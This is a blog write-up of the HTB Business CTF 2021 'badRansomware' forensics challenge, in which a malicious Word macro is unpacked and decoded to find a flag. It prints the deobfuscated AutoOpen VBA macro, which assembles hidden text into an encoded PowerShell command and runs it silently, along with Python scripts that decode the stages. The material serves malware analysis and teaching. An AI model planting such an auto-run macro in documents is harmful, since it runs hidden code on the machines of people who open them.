Kamil Gierach-Pacanek
CyberEthical.Me: Hacking for the Security Awareness

CyberEthical.Me: Hacking for the Security Awareness

HTB Business CTF 2021: badRansomware

HTB Business CTF 2021: badRansomware

Kamil Gierach-Pacanek's photo
Kamil Gierach-Pacanek

Published on Aug 1, 2021

5 min read

Subscribe to my newsletter and never miss my upcoming articles

Introduction

A wave of phishing emails came in today that seem to be executing some kind of bad ransomware. The triage team said they create encrypted copies of all the files in your Downloads folder, but forgot to delete the originals. Oops. Anyway, see if you can take a closer look and find the flag.

This is a complete write-up for the badRansomware challenge at Business CTF 2021 hosted by Hack The Box. This article is a part of the HTB Business CTF 2021 series.

Learn more from additional readings found at the end of the article. I would be thankful if you mention me when using parts of this article in your work. Enjoy!


Contents

  1. Introduction
  2. Basic Information
  3. Analysis
  4. Second payload
  5. Third payload
  6. Additional readings

Basic Information

#
TypeJeopardy CTF / Forensics
Organized byHack The Box
NameHTB Business CTF 2021 / badRansomware
CTFtime weight24.33
Solves147
Started2021/07/23 12:00 UTC
Ended2021/07/25 18:00 UTC
URLsctf.hackthebox.eu/ctf/135
AuthorAsentinn / NetCrawlers
ctftime.org/team/159004

πŸ”” CyberEthical.Me is maintained purely from your donations - consider one-time sponsoring with the Sponsor button or 🎁 become a Patron which also gives you some bonus perks.

Analysis

We are provided with the forensics_badransomware.zip file.

$ unzip forensics_badransomware.zip
$ file badRansomware.docm

2021-07-27-00-14-32.png

Knowing that Word documents are archives, I'm extracting the contents of the *.docm

$ mkdir badRansomware
$ cp badRansomware.docm badRansomware/badRansomware.zip
$ cd badRansomware
$ unzip badRansomware.zip
$ rm badRansomware.zip
$ tree

2021-07-29-14-42-11.png

We can see that there are some VBA related files - this document contains a macro.

VBA Macro

Useful tool to extract the potential malicious code from word files is olevba from oletools

$ olevba --deobf badRansomware.docm > olevba.out
$ nano olevba.out

Now we have the obfuscated VBA code

2021-07-29-14-46-17.png

I'm copying the content of the macro to the separate file, create a copy of it, and I'm starting to deobfucate. I'm removing all the Sleep 0 lines and tangent calculations because they are useless. I'm changing the variables names to make it more understandable and fix indentation. This is a result.

'macro_deobfuscated.vba

Sub AutoOpen()
    Dim someString
    someString = ActiveDocument.Shapes("pelxcitrdd").AlternativeText
    someString = ActiveDocument.Shapes("adaopiwer").AlternativeText & someString
    someString = Split(someString, "@@@")

    Dim iterator
    iterator = 0

    Dim someStringLength
    someStringLength = UBound(someString) - 1

    Dim commandString

    For E = iterator To someStringLength
        Dim singeCharacterFromString
        Dim convertedChar

        singeCharacterFromString = someString(E)
        convertedChar = ChrW(singeCharacterFromString)
        commandString = commandString & convertedChar

    Next

    commandString = "powershell -e IAB" & commandString

    Call Shell(commandString, 0)
End Sub

Back to top ‴

Entry subroutine

This function (or subroutine):

  1. Take pelxcitrdd and adaopiwer properties value from the document.
  2. Append pelxcitrdd to adaopiwer (adaopiwer+pelxcitrdd)

Note the order of concatenation.

  1. Split by @@@. This creates an array of strings.
  2. Converted each element in this array using ChrW function. This means these array elements are Unicode character codes.
  3. Each Unicode character is concatenated in a single long string.
  4. Finally, string is passed to the PowerShell as an encoded command.

Now we should look at the other files for @@@ strings.

$ grep -lr "@@@" *

-l, display only file names

-r, recursive search

2021-07-29-16-36-08.png

By looking at the content of the word/document.xml file, we indeed can see the pelxcitrdd and adaopiwer properties with the description we are interested in here.

2021-07-29-16-40-43.png

Let's copy both contents to the separate files called pelxcitrdd and adaopiwer.

2021-07-29-16-42-36.png

We are ready to assemble the encoded command

#!/bin/python

import sys, string

ct1 = ""
ct2 = ""


with open('pelxcitrdd') as file1:
        ct1 = file1.read().strip()
with open('adaopiwer') as file1:
        ct2 = file1.read().strip()

charCodes = (ct2+ct1).split("@@@")

command = "".join([chr(int(c)) for c in charCodes])

print(command)

2021-07-29-17-33-39.png

As you can see, we ended up with a redundant x character (character code 120). Also don't be misled by being used to see powershell IEX commands - the IAB is not argument list for PowerShell, but fragment of the PowerShell encoded command!

I've spent quite a bit on this, thinking what is not right.

So add it to the beginning of the string and decode it from base64. This is a complete script

#!/bin/python

import sys, string, base64

ct1 = ""
ct2 = ""

with open('pelxcitrdd') as file1:
        ct1 = file1.read().strip()
with open('adaopiwer') as file1:
        ct2 = file1.read().strip()

charCodes = (ct2+ct1).split("@@@")
encodedCommand = "".join([chr(int(c)) for c in charCodes]).rstrip("x")
command = base64.b64decode(("IAB"+encodedCommand))

print(command)

Back to top ‴

Second payload

2021-07-29-18-01-24.png

Now we have to work with a long string and when we look closer these are once again character codes separated by following characters: XwcIMp}UR%

To make it a bit easier, I've extracted the string between IEX and split commands and parsed it using Python script.

#!/bin/python

import re

payload = '/cut/'
charCodes = re.split('X|w|c|I|M|p|}|U|R|%',payload)
encodedCommand = "".join([chr(int(c)) for c in charCodes])

print(encodedCommand)

Back to top ‴

Third payload

2021-07-29-18-29-45.png

This time, we can see we achieved the readable payload - this often means we are finally at the actual malicious code.

Assuming, this is indeed the final payload - because I can see there are some memory streams operation (remember that is a code for software that encrypts files) - I'm trying to look at the script without deobfuscation.

Also because I don't know how to safely do that automaticaly, if you know, please let me know in the comments.

I've noticed that one value is a bit cryptic, yet familiar:

2021-07-29-18-44-43.png

By pasting the string format command to the PowerShell and converting the base64 to text in CyberChef I am able to retrieve the flag.

2021-07-29-18-46-32.png

2021-07-29-18-46-59.png

Back to top ‴

Additional readings

πŸ“Œ Follow the #CyberEthical hashtag on the social media

🎁 Become a Patron and gain additional benefits

πŸ‘‰ Instagram: @cyber.ethical.me

πŸ‘‰ LinkedIn: Kamil Gierach-Pacanek

πŸ‘‰ Twitter: @cyberethical_me

πŸ‘‰ Facebook: @CyberEthicalMe

Back to top ‴

Did you find this article valuable?

Support Kamil Gierach-Pacanek by becoming a sponsor. Any amount is appreciated!

See recent sponsors |Β Learn more about Hashnode Sponsors
Β 
Share this